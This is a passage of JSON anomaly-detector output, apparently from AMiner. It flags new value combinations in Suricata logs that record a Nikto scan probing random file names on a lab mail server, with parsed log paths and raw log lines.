"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46958, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":829521377532493,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 829521377532493, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80", "/parser/model/time": 1583349514.37056, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", 
"/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46960, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cmd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.370766, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":380826144121724,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46960, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":380826144121724,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 380826144121724, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80", "/parser/model/time": 1583349514.372779, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46962, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.x-shop", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.37316, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":319004384865496,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46962, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":319004384865496,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 319004384865496, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80", "/parser/model/time": 1583349514.375251, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46964, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dbc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
